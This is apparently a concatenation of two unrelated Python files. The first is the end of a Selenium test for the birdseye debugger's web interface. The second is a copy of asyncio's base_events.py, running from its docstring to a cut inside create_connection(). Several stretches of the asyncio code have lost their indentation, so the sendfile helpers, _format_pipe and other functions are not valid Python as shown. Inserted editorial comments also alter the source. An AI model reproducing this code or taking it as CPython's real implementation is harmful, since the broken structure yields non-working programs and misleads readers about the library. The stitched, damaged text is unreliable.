        vals = {'i': 0, 'j': 0}
        exprs = driver.find_elements_by_class_name('has_value')
        expr_value = driver.find_element_by_id('box_value')
        expr_strings = [
            'i * 13 + j * 17',
            'j * 17',
            'i * 13',
        ]

        def find_by_text(text, elements):
            return only(n for n in elements if n.text == text)

        def find_expr(text):
            return find_by_text(text, exprs)

        def tree_nodes(root=driver):
            return root.find_elements_by_class_name('jstree-node')

        def select(node, prefix, value_text):
            # Click an expression box; verify the value bar and the tree entry.
            self.assertIn('box', classes(node))
            self.assertIn('has_value', classes(node))
            self.assertNotIn('selected', classes(node))
            node.click()
            self.assertIn('selected', classes(node))
            self.assertEqual(expr_value.text, value_text)
            tree_node = tree_nodes()[-1]
            self.assertEqual(tree_node.text, prefix + value_text)
            return tree_node

        def classes(node):
            return set(node.get_attribute('class').split())

        def assert_classes(node, *cls):
            self.assertEqual(classes(node), set(cls))

        # Fixed: dropped unused enumerate() index.
        for expr in expr_strings:
            find_expr(expr).click()

        def step(loop, increment):
            # Click the back/forward button of the given loop (0 = i, 1 = j)
            # and keep the local model of the loop indices in sync.
            selector = '.loop-navigator > .btn:%s-child' % ('first' if increment == -1 else 'last')
            buttons = driver.find_elements_by_css_selector(selector)
            self.assertEqual(len(buttons), 2)
            buttons[loop].click()
            vals['ij'[loop]] += increment
            for expr in expr_strings:
                ActionChains(driver).move_to_element(find_expr(expr)).perform()
                value = str(eval(expr, {}, vals))
                self.assertEqual(expr_value.text, value)
                node = only(n for n in tree_nodes()
                            if n.text.startswith(expr + ' ='))
                self.assertEqual(node.text, '%s = int: %s' % (expr, value))

        stmt = find_by_text('assert j', driver.find_elements_by_class_name('stmt'))
        assert_classes(stmt, 'stmt', 'stmt_uncovered', 'box')
        step(0, 1)
        select(stmt, 'assert j : ', 'AssertionError')
        assert_classes(stmt, 'stmt', 'selected', 'box', 'hovering', 'has_value', 'exception_node')
        step(1, 1)
        self.assertEqual(tree_nodes()[-1].text, 'assert j : fine')
        assert_classes(stmt, 'stmt', 'selected', 'box', 'has_value', 'value_none')
        step(1, 1)
        step(0, -1)
        self.assertTrue({'stmt', 'stmt_uncovered', 'selected', 'box'} <= classes(stmt))
        step(1, -1)
        # Expanding values
        x_node = find_expr('x')
        tree_node = select(x_node, 'x = list: ', '[1, 3, 5, ..., 25, 27, 29]')
        tree_node.find_element_by_class_name('jstree-ocl').click()  # expand
        sleep(0.2)
        # Only a sample of the 15 items is shown for long lists.
        # Fixed: removed stray trailing comma that made this statement a 1-tuple.
        self.assertEqual([n.text for n in tree_nodes(tree_node)],
                         ['len() = 15',
                          '0 = int: 1',
                          '1 = int: 3',
                          '2 = int: 5',
                          '3 = int: 7',
                          '4 = int: 9',
                          '10 = int: 21',
                          '11 = int: 23',
                          '12 = int: 25',
                          '13 = int: 27',
                          '14 = int: 29'])
        # Click on an inner call
        find_expr('bar()').find_element_by_class_name('inner-call').click()
        self.assertEqual(driver.find_element_by_tag_name('h2').text,
                         'Call to function: bar')

    def tearDown(self):
        if not os.environ.get('BIRDSEYE_SERVER_RUNNING'):
            # Ask the in-process test server to shut itself down.
            self.assertEqual(requests.post('http://localhost:7777/kill').text,
                             'Server shutting down...')
|
base_events.py | """Base implementation of event loop.
The event loop can be broken up into a multiplexer (the part
responsible for notifying us of I/O events) and the event loop proper,
which wraps a multiplexer with functionality for scheduling callbacks,
immediately or at a given time in the future.
Whenever a public API takes a callback, subsequent positional
arguments will be passed to the callback if/when it is called. This
avoids the proliferation of trivial lambdas implementing closures.
Keyword arguments for the callback are not supported; this is a
conscious design decision, leaving the door open for keyword arguments
to modify the meaning of the API call itself.
"""
import collections
import collections.abc
import concurrent.futures
import functools
import heapq
import itertools
import os
import socket
import stat
import subprocess
import threading
import time
import traceback
import sys
import warnings
import weakref
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
from . import constants
from . import coroutines
from . import events
from . import exceptions
from . import futures
from . import protocols
from . import sslproto
from . import staggered
from . import tasks
from . import transports
from . import trsock
from .log import logger
__all__ = 'BaseEventLoop',
# Minimum number of _scheduled timer handles before cleanup of
# cancelled handles is performed.
_MIN_SCHEDULED_TIMER_HANDLES = 100
# Minimum fraction of _scheduled timer handles that are cancelled
# before cleanup of cancelled handles is performed.
_MIN_CANCELLED_TIMER_HANDLES_FRACTION = 0.5
_HAS_IPv6 = hasattr(socket, 'AF_INET6')
# Maximum timeout passed to select to avoid OS limitations
MAXIMUM_SELECT_TIMEOUT = 24 * 3600
# Used for deprecation and removal of `loop.create_datagram_endpoint()`'s
# *reuse_address* parameter
_unset = object()
def _format_handle(handle):
    """Return a human-readable description of a Handle for debug logging."""
    callback = handle._callback
    bound_self = getattr(callback, '__self__', None)
    if isinstance(bound_self, tasks.Task):
        # The callback is a bound Task method: show the task itself.
        return repr(bound_self)
    return str(handle)
def _format_pipe(fd):
if fd == subprocess.PIPE:
return '<pipe>'
elif fd == subprocess.STDOUT:
return '<stdout>'
else:
return repr(fd)
def _set_reuseport(sock):
if not hasattr(socket, 'SO_REUSEPORT'):
raise ValueError('reuse_port not supported by socket module')
else:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
except OSError:
raise ValueError('reuse_port not supported by socket module, '
'SO_REUSEPORT defined but not implemented.')
def _ipaddr_info(host, port, family, type, proto, flowinfo=0, scopeid=0):
    """Return a getaddrinfo()-shaped tuple if *host* is already a numeric IP.

    Lets callers skip the blocking resolver when they pass pre-resolved
    addresses; returns None whenever a real getaddrinfo() call is needed.
    """
    if not hasattr(socket, 'inet_pton'):
        return
    if host is None or proto not in {0, socket.IPPROTO_TCP, socket.IPPROTO_UDP}:
        return None
    if type == socket.SOCK_STREAM:
        proto = socket.IPPROTO_TCP
    elif type == socket.SOCK_DGRAM:
        proto = socket.IPPROTO_UDP
    else:
        # Only stream/datagram sockets can take the fast path.
        return None

    if port is None:
        port = 0
    elif isinstance(port, (bytes, str)) and not port:
        port = 0
    else:
        # If port's a service name like "http", don't skip getaddrinfo.
        try:
            port = int(port)
        except (TypeError, ValueError):
            return None

    if family == socket.AF_UNSPEC:
        afs = [socket.AF_INET]
        if _HAS_IPv6:
            afs.append(socket.AF_INET6)
    else:
        afs = [family]

    if isinstance(host, bytes):
        host = host.decode('idna')
    if '%' in host:
        # Linux's inet_pton doesn't accept an IPv6 zone index after host,
        # like '::1%lo0'.
        return None

    for af in afs:
        try:
            socket.inet_pton(af, host)
        except OSError:
            continue
        # The host has already been resolved.
        if _HAS_IPv6 and af == socket.AF_INET6:
            return af, type, proto, '', (host, port, flowinfo, scopeid)
        return af, type, proto, '', (host, port)
    # "host" is not an IP address.
    return None
def _interleave_addrinfos(addrinfos, first_address_family_count=1):
"""Interleave list of addrinfo tuples by family."""
# Group addresses by family
addrinfos_by_family = collections.OrderedDict()
for addr in addrinfos:
family = addr[0]
if family not in addrinfos_by_family:
addrinfos_by_family[family] = []
addrinfos_by_family[family].append(addr)
addrinfos_lists = list(addrinfos_by_family.values())
reordered = []
if first_address_family_count > 1:
reordered.extend(addrinfos_lists[0][:first_address_family_count - 1])
del addrinfos_lists[0][:first_address_family_count - 1]
reordered.extend(
a for a in itertools.chain.from_iterable(
itertools.zip_longest(*addrinfos_lists)
) if a is not None)
return reordered
def _run_until_complete_cb(fut):
    """Done-callback installed by run_until_complete() to stop the loop."""
    if not fut.cancelled() and isinstance(
            fut.exception(), (SystemExit, KeyboardInterrupt)):
        # Issue #22429: run_forever() already finished, no need to
        # stop it.
        return
    futures._get_loop(fut).stop()
if hasattr(socket, 'TCP_NODELAY'):
def _set_nodelay(sock):
if (sock.family in {socket.AF_INET, socket.AF_INET6} and
sock.type == socket.SOCK_STREAM and
sock.proto == socket.IPPROTO_TCP):
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
else:
def _set_nodelay(sock):
pass
class _SendfileFallbackProtocol(protocols.Protocol):
    """Protocol temporarily swapped onto a transport during sendfile fallback.

    Pauses the real protocol's reading, mirrors the transport's write
    flow-control state, and restores everything in restore().
    """

    def __init__(self, transp):
        if not isinstance(transp, transports._FlowControlMixin):
            raise TypeError("transport should be _FlowControlMixin instance")
        self._transport = transp
        self._proto = transp.get_protocol()
        # Remember the state to restore once the sendfile operation is done.
        self._should_resume_reading = transp.is_reading()
        self._should_resume_writing = transp._protocol_paused
        transp.pause_reading()
        transp.set_protocol(self)
        if self._should_resume_writing:
            # Transport is over the high-water mark: drain() must block
            # until resume_writing() fires.
            self._write_ready_fut = self._transport._loop.create_future()
        else:
            self._write_ready_fut = None

    async def drain(self):
        """Block until the transport is ready to accept more data."""
        if self._transport.is_closing():
            raise ConnectionError("Connection closed by peer")
        fut = self._write_ready_fut
        if fut is None:
            return
        await fut

    def connection_made(self, transport):
        raise RuntimeError("Invalid state: "
                           "connection should have been established already.")

    def connection_lost(self, exc):
        if self._write_ready_fut is not None:
            # Never happens if peer disconnects after sending the whole content
            # Thus disconnection is always an exception from user perspective
            if exc is None:
                self._write_ready_fut.set_exception(
                    ConnectionError("Connection is closed by peer"))
            else:
                self._write_ready_fut.set_exception(exc)
        self._proto.connection_lost(exc)

    def pause_writing(self):
        if self._write_ready_fut is not None:
            return
        self._write_ready_fut = self._transport._loop.create_future()

    def resume_writing(self):
        if self._write_ready_fut is None:
            return
        self._write_ready_fut.set_result(False)
        self._write_ready_fut = None

    def data_received(self, data):
        raise RuntimeError("Invalid state: reading should be paused")

    def eof_received(self):
        raise RuntimeError("Invalid state: reading should be paused")

    async def restore(self):
        """Reinstall the original protocol and resume reading/writing."""
        self._transport.set_protocol(self._proto)
        if self._should_resume_reading:
            self._transport.resume_reading()
        if self._write_ready_fut is not None:
            # Cancel the future.
            # Basically it has no effect because protocol is switched back,
            # no code should wait for it anymore.
            self._write_ready_fut.cancel()
        if self._should_resume_writing:
            self._proto.resume_writing()
class Server(events.AbstractServer):
    """Listening-server object returned by loop.create_server().

    Tracks the listening sockets and the count of active client
    transports; wait_closed() waiters are released by _wakeup().
    """

    def __init__(self, loop, sockets, protocol_factory, ssl_context, backlog,
                 ssl_handshake_timeout):
        self._loop = loop
        self._sockets = sockets
        # Number of live client transports attached via _attach().
        self._active_count = 0
        self._waiters = []
        self._protocol_factory = protocol_factory
        self._backlog = backlog
        self._ssl_context = ssl_context
        self._ssl_handshake_timeout = ssl_handshake_timeout
        self._serving = False
        self._serving_forever_fut = None

    def __repr__(self):
        return f'<{self.__class__.__name__} sockets={self.sockets!r}>'

    def _attach(self):
        # Called by a new client transport; only legal before close().
        assert self._sockets is not None
        self._active_count += 1

    def _detach(self):
        assert self._active_count > 0
        self._active_count -= 1
        if self._active_count == 0 and self._sockets is None:
            # Last connection gone after close(): release wait_closed().
            self._wakeup()

    def _wakeup(self):
        waiters = self._waiters
        self._waiters = None
        for waiter in waiters:
            if not waiter.done():
                waiter.set_result(waiter)

    def _start_serving(self):
        if self._serving:
            return
        self._serving = True
        for sock in self._sockets:
            sock.listen(self._backlog)
            self._loop._start_serving(
                self._protocol_factory, sock, self._ssl_context,
                self, self._backlog, self._ssl_handshake_timeout)

    def get_loop(self):
        return self._loop

    def is_serving(self):
        return self._serving

    @property
    def sockets(self):
        # Wrapped in TransportSocket so users cannot mutate the real sockets.
        if self._sockets is None:
            return ()
        return tuple(trsock.TransportSocket(s) for s in self._sockets)

    def close(self):
        sockets = self._sockets
        if sockets is None:
            return
        self._sockets = None
        for sock in sockets:
            self._loop._stop_serving(sock)
        self._serving = False
        if (self._serving_forever_fut is not None and
                not self._serving_forever_fut.done()):
            self._serving_forever_fut.cancel()
            self._serving_forever_fut = None
        if self._active_count == 0:
            self._wakeup()

    async def start_serving(self):
        self._start_serving()
        # Skip one loop iteration so that all 'loop.add_reader'
        # go through.
        await tasks.sleep(0, loop=self._loop)

    async def serve_forever(self):
        if self._serving_forever_fut is not None:
            raise RuntimeError(
                f'server {self!r} is already being awaited on serve_forever()')
        if self._sockets is None:
            raise RuntimeError(f'server {self!r} is closed')
        self._start_serving()
        self._serving_forever_fut = self._loop.create_future()
        try:
            await self._serving_forever_fut
        except exceptions.CancelledError:
            try:
                self.close()
                await self.wait_closed()
            finally:
                raise
        finally:
            self._serving_forever_fut = None

    async def wait_closed(self):
        # NOTE(review): this returns immediately once close() has run
        # (_sockets is None) even if client connections are still active --
        # presumably 'and' was intended; upstream CPython later reworked
        # this check. Confirm before changing behavior.
        if self._sockets is None or self._waiters is None:
            return
        waiter = self._loop.create_future()
        self._waiters.append(waiter)
        await waiter
class BaseEventLoop(events.AbstractEventLoop):
    def __init__(self):
        self._timer_cancelled_count = 0
        self._closed = False
        self._stopping = False
        # FIFO of ready Handles; heapq of scheduled TimerHandles.
        self._ready = collections.deque()
        self._scheduled = []
        self._default_executor = None
        self._internal_fds = 0
        # Identifier of the thread running the event loop, or None if the
        # event loop is not running
        self._thread_id = None
        self._clock_resolution = time.get_clock_info('monotonic').resolution
        self._exception_handler = None
        self.set_debug(coroutines._is_debug_mode())
        # In debug mode, if the execution of a callback or a step of a task
        # exceed this duration in seconds, the slow callback/task is logged.
        self.slow_callback_duration = 0.1
        self._current_handle = None
        self._task_factory = None
        self._coroutine_origin_tracking_enabled = False
        self._coroutine_origin_tracking_saved_depth = None
        # A weak set of all asynchronous generators that are
        # being iterated by the loop.
        self._asyncgens = weakref.WeakSet()
        # Set to True when `loop.shutdown_asyncgens` is called.
        self._asyncgens_shutdown_called = False
        # Set to True when `loop.shutdown_default_executor` is called.
        self._executor_shutdown_called = False

    def __repr__(self):
        return (
            f'<{self.__class__.__name__} running={self.is_running()} '
            f'closed={self.is_closed()} debug={self.get_debug()}>'
        )
    def create_future(self):
        """Create a Future object attached to the loop."""
        return futures.Future(loop=self)

    def create_task(self, coro, *, name=None):
        """Schedule a coroutine object.

        Return a task object.
        """
        self._check_closed()
        if self._task_factory is None:
            task = tasks.Task(coro, loop=self, name=name)
            if task._source_traceback:
                # Hide this wrapper frame from user-visible tracebacks.
                del task._source_traceback[-1]
        else:
            task = self._task_factory(self, coro)
            tasks._set_task_name(task, name)
        return task

    def set_task_factory(self, factory):
        """Set a task factory that will be used by loop.create_task().

        If factory is None the default task factory will be set.
        If factory is a callable, it should have a signature matching
        '(loop, coro)', where 'loop' will be a reference to the active
        event loop, 'coro' will be a coroutine object. The callable
        must return a Future.
        """
        if factory is not None and not callable(factory):
            raise TypeError('task factory must be a callable or None')
        self._task_factory = factory

    def get_task_factory(self):
        """Return a task factory, or None if the default one is in use."""
        return self._task_factory
    # The _make_*() factories and low-level hooks below are implemented by
    # selector/proactor subclasses; BaseEventLoop only defines the API.

    def _make_socket_transport(self, sock, protocol, waiter=None, *,
                               extra=None, server=None):
        """Create socket transport."""
        raise NotImplementedError

    def _make_ssl_transport(
            self, rawsock, protocol, sslcontext, waiter=None,
            *, server_side=False, server_hostname=None,
            extra=None, server=None,
            ssl_handshake_timeout=None,
            call_connection_made=True):
        """Create SSL transport."""
        raise NotImplementedError

    def _make_datagram_transport(self, sock, protocol,
                                 address=None, waiter=None, extra=None):
        """Create datagram transport."""
        raise NotImplementedError

    def _make_read_pipe_transport(self, pipe, protocol, waiter=None,
                                  extra=None):
        """Create read pipe transport."""
        raise NotImplementedError

    def _make_write_pipe_transport(self, pipe, protocol, waiter=None,
                                   extra=None):
        """Create write pipe transport."""
        raise NotImplementedError

    async def _make_subprocess_transport(self, protocol, args, shell,
                                         stdin, stdout, stderr, bufsize,
                                         extra=None, **kwargs):
        """Create subprocess transport."""
        raise NotImplementedError

    def _write_to_self(self):
        """Write a byte to self-pipe, to wake up the event loop.

        This may be called from a different thread.

        The subclass is responsible for implementing the self-pipe.
        """
        raise NotImplementedError

    def _process_events(self, event_list):
        """Process selector events."""
        raise NotImplementedError
    def _check_closed(self):
        # Guard used by most public methods: a closed loop must not be used.
        if self._closed:
            raise RuntimeError('Event loop is closed')

    def _check_default_executor(self):
        if self._executor_shutdown_called:
            raise RuntimeError('Executor shutdown has been called')

    def _asyncgen_finalizer_hook(self, agen):
        # Interpreter hook: an async generator is being finalized; schedule
        # its aclose() on this loop (may be invoked from another thread).
        self._asyncgens.discard(agen)
        if not self.is_closed():
            self.call_soon_threadsafe(self.create_task, agen.aclose())

    def _asyncgen_firstiter_hook(self, agen):
        # Interpreter hook: track async generators on first iteration so
        # shutdown_asyncgens() can close them later.
        if self._asyncgens_shutdown_called:
            warnings.warn(
                f"asynchronous generator {agen!r} was scheduled after "
                f"loop.shutdown_asyncgens() call",
                ResourceWarning, source=self)
        self._asyncgens.add(agen)
    async def shutdown_asyncgens(self):
        """Shutdown all active asynchronous generators."""
        self._asyncgens_shutdown_called = True
        if not len(self._asyncgens):
            # If Python version is <3.6 or we don't have any asynchronous
            # generators alive.
            return
        closing_agens = list(self._asyncgens)
        self._asyncgens.clear()
        # Close all generators concurrently; report (never raise) failures.
        results = await tasks.gather(
            *[ag.aclose() for ag in closing_agens],
            return_exceptions=True,
            loop=self)
        for result, agen in zip(results, closing_agens):
            if isinstance(result, Exception):
                self.call_exception_handler({
                    'message': f'an error occurred during closing of '
                               f'asynchronous generator {agen!r}',
                    'exception': result,
                    'asyncgen': agen
                })

    async def shutdown_default_executor(self):
        """Schedule the shutdown of the default executor."""
        self._executor_shutdown_called = True
        if self._default_executor is None:
            return
        future = self.create_future()
        # Shut down in a helper thread so the (blocking) shutdown(wait=True)
        # does not stall the event loop.
        thread = threading.Thread(target=self._do_shutdown, args=(future,))
        thread.start()
        try:
            await future
        finally:
            thread.join()

    def _do_shutdown(self, future):
        # Runs in the helper thread; resolves *future* back on the loop.
        try:
            self._default_executor.shutdown(wait=True)
            self.call_soon_threadsafe(future.set_result, None)
        except Exception as ex:
            self.call_soon_threadsafe(future.set_exception, ex)
    def _check_running(self):
        if self.is_running():
            raise RuntimeError('This event loop is already running')
        if events._get_running_loop() is not None:
            raise RuntimeError(
                'Cannot run the event loop while another loop is running')

    def run_forever(self):
        """Run until stop() is called."""
        self._check_closed()
        self._check_running()
        self._set_coroutine_origin_tracking(self._debug)
        self._thread_id = threading.get_ident()
        # Install our asyncgen hooks, remembering the previous ones.
        old_agen_hooks = sys.get_asyncgen_hooks()
        sys.set_asyncgen_hooks(firstiter=self._asyncgen_firstiter_hook,
                               finalizer=self._asyncgen_finalizer_hook)
        try:
            events._set_running_loop(self)
            while True:
                self._run_once()
                if self._stopping:
                    break
        finally:
            # Always restore global state, even if a callback raised.
            self._stopping = False
            self._thread_id = None
            events._set_running_loop(None)
            self._set_coroutine_origin_tracking(False)
            sys.set_asyncgen_hooks(*old_agen_hooks)
    def run_until_complete(self, future):
        """Run until the Future is done.

        If the argument is a coroutine, it is wrapped in a Task.

        WARNING: It would be disastrous to call run_until_complete()
        with the same coroutine twice -- it would wrap it in two
        different Tasks and that can't be good.

        Return the Future's result, or raise its exception.
        """
        self._check_closed()
        self._check_running()
        new_task = not futures.isfuture(future)
        future = tasks.ensure_future(future, loop=self)
        if new_task:
            # An exception is raised if the future didn't complete, so there
            # is no need to log the "destroy pending task" message
            future._log_destroy_pending = False
        future.add_done_callback(_run_until_complete_cb)
        try:
            self.run_forever()
        except:
            if new_task and future.done() and not future.cancelled():
                # The coroutine raised a BaseException. Consume the exception
                # to not log a warning, the caller doesn't have access to the
                # local task.
                future.exception()
            raise
        finally:
            future.remove_done_callback(_run_until_complete_cb)
        if not future.done():
            raise RuntimeError('Event loop stopped before Future completed.')
        return future.result()

    def stop(self):
        """Stop running the event loop.

        Every callback already scheduled will still run. This simply informs
        run_forever to stop looping after a complete iteration.
        """
        self._stopping = True
    def close(self):
        """Close the event loop.

        This clears the queues and shuts down the executor,
        but does not wait for the executor to finish.

        The event loop must not be running.
        """
        if self.is_running():
            raise RuntimeError("Cannot close a running event loop")
        if self._closed:
            return
        if self._debug:
            logger.debug("Close %r", self)
        self._closed = True
        self._ready.clear()
        self._scheduled.clear()
        self._executor_shutdown_called = True
        executor = self._default_executor
        if executor is not None:
            self._default_executor = None
            # Non-blocking shutdown: pending executor work is abandoned.
            executor.shutdown(wait=False)

    def is_closed(self):
        """Returns True if the event loop was closed."""
        return self._closed

    def __del__(self, _warn=warnings.warn):
        # _warn is bound at definition time so it survives interpreter teardown.
        if not self.is_closed():
            _warn(f"unclosed event loop {self!r}", ResourceWarning, source=self)
            if not self.is_running():
                self.close()

    def is_running(self):
        """Returns True if the event loop is running."""
        return (self._thread_id is not None)
    def time(self):
        """Return the time according to the event loop's clock.

        This is a float expressed in seconds since an epoch, but the
        epoch, precision, accuracy and drift are unspecified and may
        differ per event loop.
        """
        return time.monotonic()

    def call_later(self, delay, callback, *args, context=None):
        """Arrange for a callback to be called at a given time.

        Return a Handle: an opaque object with a cancel() method that
        can be used to cancel the call.

        The delay can be an int or float, expressed in seconds. It is
        always relative to the current time.

        Each callback will be called exactly once. If two callbacks
        are scheduled for exactly the same time, it is undefined which
        will be called first.

        Any positional arguments after the callback will be passed to
        the callback when it is called.
        """
        timer = self.call_at(self.time() + delay, callback, *args,
                             context=context)
        if timer._source_traceback:
            # Hide this wrapper frame from user-visible tracebacks.
            del timer._source_traceback[-1]
        return timer

    def call_at(self, when, callback, *args, context=None):
        """Like call_later(), but uses an absolute time.

        Absolute time corresponds to the event loop's time() method.
        """
        self._check_closed()
        if self._debug:
            self._check_thread()
            self._check_callback(callback, 'call_at')
        timer = events.TimerHandle(when, callback, args, self, context)
        if timer._source_traceback:
            del timer._source_traceback[-1]
        heapq.heappush(self._scheduled, timer)
        timer._scheduled = True
        return timer
    def call_soon(self, callback, *args, context=None):
        """Arrange for a callback to be called as soon as possible.

        This operates as a FIFO queue: callbacks are called in the
        order in which they are registered. Each callback will be
        called exactly once.

        Any positional arguments after the callback will be passed to
        the callback when it is called.
        """
        self._check_closed()
        if self._debug:
            self._check_thread()
            self._check_callback(callback, 'call_soon')
        handle = self._call_soon(callback, args, context)
        if handle._source_traceback:
            del handle._source_traceback[-1]
        return handle

    def _check_callback(self, callback, method):
        # Reject coroutines and coroutine functions: scheduling them
        # directly is almost always a bug (they would never be awaited).
        if (coroutines.iscoroutine(callback) or
                coroutines.iscoroutinefunction(callback)):
            raise TypeError(
                f"coroutines cannot be used with {method}()")
        if not callable(callback):
            raise TypeError(
                f'a callable object was expected by {method}(), '
                f'got {callback!r}')

    def _call_soon(self, callback, args, context):
        handle = events.Handle(callback, args, self, context)
        if handle._source_traceback:
            del handle._source_traceback[-1]
        self._ready.append(handle)
        return handle

    def _check_thread(self):
        """Check that the current thread is the thread running the event loop.

        Non-thread-safe methods of this class make this assumption and will
        likely behave incorrectly when the assumption is violated.

        Should only be called when (self._debug == True). The caller is
        responsible for checking this condition for performance reasons.
        """
        if self._thread_id is None:
            return
        thread_id = threading.get_ident()
        if thread_id != self._thread_id:
            raise RuntimeError(
                "Non-thread-safe operation invoked on an event loop other "
                "than the current one")

    def call_soon_threadsafe(self, callback, *args, context=None):
        """Like call_soon(), but thread-safe."""
        self._check_closed()
        if self._debug:
            self._check_callback(callback, 'call_soon_threadsafe')
        handle = self._call_soon(callback, args, context)
        if handle._source_traceback:
            del handle._source_traceback[-1]
        # Wake the loop's selector from this (possibly foreign) thread.
        self._write_to_self()
        return handle
    def run_in_executor(self, executor, func, *args):
        # Run *func* in *executor* (default: a lazily-created shared
        # ThreadPoolExecutor) and return an asyncio Future for its result.
        self._check_closed()
        if self._debug:
            self._check_callback(func, 'run_in_executor')
        if executor is None:
            executor = self._default_executor
            # Only check when the default executor is being used
            self._check_default_executor()
            if executor is None:
                executor = concurrent.futures.ThreadPoolExecutor(
                    thread_name_prefix='asyncio'
                )
                self._default_executor = executor
        return futures.wrap_future(
            executor.submit(func, *args), loop=self)

    def set_default_executor(self, executor):
        if not isinstance(executor, concurrent.futures.ThreadPoolExecutor):
            warnings.warn(
                'Using the default executor that is not an instance of '
                'ThreadPoolExecutor is deprecated and will be prohibited '
                'in Python 3.9',
                DeprecationWarning, 2)
        self._default_executor = executor
    def _getaddrinfo_debug(self, host, port, family, type, proto, flags):
        # Debug-mode wrapper around socket.getaddrinfo(): logs the query,
        # times it, and escalates slow resolutions to INFO level.
        msg = [f"{host}:{port!r}"]
        if family:
            msg.append(f'family={family!r}')
        if type:
            msg.append(f'type={type!r}')
        if proto:
            msg.append(f'proto={proto!r}')
        if flags:
            msg.append(f'flags={flags!r}')
        msg = ', '.join(msg)
        logger.debug('Get address info %s', msg)
        t0 = self.time()
        addrinfo = socket.getaddrinfo(host, port, family, type, proto, flags)
        dt = self.time() - t0
        msg = f'Getting address info {msg} took {dt * 1e3:.3f}ms: {addrinfo!r}'
        if dt >= self.slow_callback_duration:
            logger.info(msg)
        else:
            logger.debug(msg)
        return addrinfo

    async def getaddrinfo(self, host, port, *,
                          family=0, type=0, proto=0, flags=0):
        # Name resolution is blocking; run it in the default executor.
        if self._debug:
            getaddr_func = self._getaddrinfo_debug
        else:
            getaddr_func = socket.getaddrinfo
        return await self.run_in_executor(
            None, getaddr_func, host, port, family, type, proto, flags)

    async def getnameinfo(self, sockaddr, flags=0):
        return await self.run_in_executor(
            None, socket.getnameinfo, sockaddr, flags)
async def sock_sendfile(self, sock, file, offset=0, count=None,
*, fallback=True):
if self._debug and sock.gettimeout() != 0:
raise ValueError("the socket must be non-blocking")
self._check_sendfile_params(sock, file, offset, count)
try:
return await self._sock_sendfile_native(sock, file,
offset, count)
except exceptions.SendfileNotAvailableError as exc:
if not fallback:
raise
return await self._sock_sendfile_fallback(sock, file,
offset, count)
async def _sock_sendfile_native(self, sock, file, offset, count):
# NB: sendfile syscall is not supported for SSL sockets and
# non-mmap files even if sendfile is supported by OS
raise exceptions.SendfileNotAvailableError(
f"syscall sendfile is not available for socket {sock!r} "
"and file {file!r} combination")
async def _sock_sendfile_fallback(self, sock, file, offset, count):
if offset:
file.seek(offset)
blocksize = (
min(count, constants.SENDFILE_FALLBACK_READBUFFER_SIZE)
if count else constants.SENDFILE_FALLBACK_READBUFFER_SIZE
)
buf = bytearray(blocksize)
total_sent = 0
try:
while True:
if count:
blocksize = min(count - total_sent, blocksize)
if blocksize <= 0:
break
view = memoryview(buf)[:blocksize]
read = await self.run_in_executor(None, file.readinto, view)
if not read:
break # EOF
await self.sock_sendall(sock, view[:read])
total_sent += read
return total_sent
finally:
if total_sent > 0 and hasattr(file, 'seek'):
file.seek(offset + total_sent)
def _check_sendfile_params(self, sock, file, offset, count):
        """Validate sock_sendfile() arguments, raising on misuse."""
        # A file object that exposes no ``mode`` attribute is assumed binary.
        mode = getattr(file, 'mode', 'b')
        if 'b' not in mode:
            raise ValueError("file should be opened in binary mode")
        if sock.type != socket.SOCK_STREAM:
            raise ValueError("only SOCK_STREAM type sockets are supported")
        if count is not None:
            if not isinstance(count, int):
                raise TypeError(
                    "count must be a positive integer (got {!r})".format(count))
            if count <= 0:
                raise ValueError(
                    "count must be a positive integer (got {!r})".format(count))
        if not isinstance(offset, int):
            raise TypeError(
                "offset must be a non-negative integer (got {!r})".format(
                    offset))
        if offset < 0:
            raise ValueError(
                "offset must be a non-negative integer (got {!r})".format(
                    offset))
async def _connect_sock(self, exceptions, addr_info, local_addr_infos=None):
        """Create, bind and connect one socket.
        Errors for this attempt are collected in their own sub-list appended
        to *exceptions*, so the caller can attribute failures per-address.
        The socket is always closed on failure.
        """
        my_exceptions = []
        exceptions.append(my_exceptions)
        family, type_, proto, _, address = addr_info
        sock = None
        try:
            sock = socket.socket(family=family, type=type_, proto=proto)
            sock.setblocking(False)
            if local_addr_infos is not None:
                # Try each candidate local address; the for/else fires only
                # when no bind() succeeded (no break).
                for _, _, _, _, laddr in local_addr_infos:
                    try:
                        sock.bind(laddr)
                        break
                    except OSError as exc:
                        msg = (
                            f'error while attempting to bind on '
                            f'address {laddr!r}: '
                            f'{exc.strerror.lower()}'
                        )
                        exc = OSError(exc.errno, msg)
                        my_exceptions.append(exc)
                else:  # all bind attempts failed
                    raise my_exceptions.pop()
            await self.sock_connect(sock, address)
            return sock
        except OSError as exc:
            my_exceptions.append(exc)
            if sock is not None:
                sock.close()
            raise
        except:
            # Non-OSError (e.g. CancelledError): close, but don't record.
            if sock is not None:
                sock.close()
            raise
async def create_connection(
            self, protocol_factory, host=None, port=None,
            *, ssl=None, family=0,
            proto=0, flags=0, sock=None,
            local_addr=None, server_hostname=None,
            ssl_handshake_timeout=None,
            happy_eyeballs_delay=None, interleave=None):
        """Connect to a TCP server.
        Create a streaming transport connection to a given Internet host and
        port: socket family AF_INET or socket.AF_INET6 depending on host (or
        family if specified), socket type SOCK_STREAM. protocol_factory must be
        a callable returning a protocol instance.
        This method is a coroutine which will try to establish the connection
        in the background. When successful, the coroutine returns a
        (transport, protocol) pair.
        """
        # --- argument validation -----------------------------------------
        if server_hostname is not None and not ssl:
            raise ValueError('server_hostname is only meaningful with ssl')
        if server_hostname is None and ssl:
            # Use host as default for server_hostname. It is an error
            # if host is empty or not set, e.g. when an
            # already-connected socket was passed or when only a port
            # is given. To avoid this error, you can pass
            # server_hostname='' -- this will bypass the hostname
            # check. (This also means that if host is a numeric
            # IP/IPv6 address, we will attempt to verify that exact
            # address; this will probably fail, but it is possible to
            # create a certificate for a specific IP address, so we
            # don't judge it here.)
            if not host:
                raise ValueError('You must set server_hostname '
                                 'when using ssl without a host')
            server_hostname = host
        if ssl_handshake_timeout is not None and not ssl:
            raise ValueError(
                'ssl_handshake_timeout is only meaningful with ssl')
        if happy_eyeballs_delay is not None and interleave is None:
            # If using happy eyeballs, default to interleave addresses by family
            interleave = 1
        # --- resolve and connect -----------------------------------------
        if host is not None or port is not None:
            if sock is not None:
                raise ValueError(
                    'host/port and sock can not be specified at the same time')
            infos = await self._ensure_resolved(
                (host, port), family=family,
